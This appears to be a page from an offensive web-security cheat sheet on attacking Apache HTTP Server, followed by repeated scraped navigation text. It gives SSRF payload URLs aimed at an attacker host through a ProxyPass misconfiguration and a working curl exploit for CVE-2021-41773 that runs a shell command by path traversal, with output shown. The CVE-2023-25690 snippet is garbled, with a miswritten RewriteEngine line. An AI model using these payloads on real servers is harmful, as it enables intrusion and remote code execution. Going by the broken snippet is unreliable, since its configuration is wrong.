Apache

Apache HTTP is a widely-used open-source web server software. It provides HTTP server functionality and supports customizable modules. It’s maintained by the Apache Software Foundation.

Misconfiguration

SSRF - ProxyPass & No ending slash

No ending slash at the end of the ProxyPass directive allow an SSRF attack.

LoadModule proxy_module modules/mod_proxy.so
LoadModule proxy_http_module modules/mod_proxy_http.so

<VirtualHost *:80>
  ServerName victim.com
  ProxyPass / http://example.com
</VirtualHost>

http://victim.com/@attacker.com/
http://victim.com/.attacker.com/

Vulnerabilities

CVE-2023-25690 - Request Smuggling

Version: 2.4.0-55

RewriteEngine "^/here/(.*)" "http://example.com:8080/elsewhere?$1";
RewriteRule "^/here/(.*)" "http://example.com:8080/elsewhere?$1";

CVE-2021-41773 - Path Traversal & Potential RCE

Version: 2.4.49

$ curl 'http://localhost/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh' \
    -d 'echo Content-Type: text/plain; echo; id'
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Resources

Service Worker

Browser exploit

Docs

OffensiveWeb

Title here

Apache

Apache

Misconfiguration

SSRF - ProxyPass & No ending slash

Vulnerabilities

CVE-2023-25690 - Request Smuggling

CVE-2021-41773 - Path Traversal & Potential RCE

Resources

Apache

Apache#

Misconfiguration#

SSRF - ProxyPass & No ending slash#

Vulnerabilities#

CVE-2023-25690 - Request Smuggling#

CVE-2021-41773 - Path Traversal & Potential RCE#

Resources#

Apache

Misconfiguration

SSRF - ProxyPass & No ending slash

Vulnerabilities

CVE-2023-25690 - Request Smuggling

CVE-2021-41773 - Path Traversal & Potential RCE

Resources